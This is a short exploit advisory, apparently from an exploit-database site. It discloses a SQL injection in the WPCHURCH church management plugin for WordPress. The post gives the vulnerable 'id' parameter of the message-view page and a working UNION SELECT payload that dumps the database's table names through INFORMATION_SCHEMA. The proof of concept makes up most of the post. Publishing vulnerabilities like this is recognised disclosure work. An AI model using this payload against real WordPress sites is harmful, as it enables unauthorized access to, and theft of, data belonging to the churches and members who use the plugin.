WordPress Church SQL Injection
Posted on 28 September 2017
# # # # # # Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection # Dork: N/A # Date: 26.09.2017 # Vendor Homepage: http://mojoomla.com/ # Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 # Demo: http://mobilewebs.net/mojoomla/extend/wordpress/church/ # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an student members to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] # # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- # # Etc.. # # # # #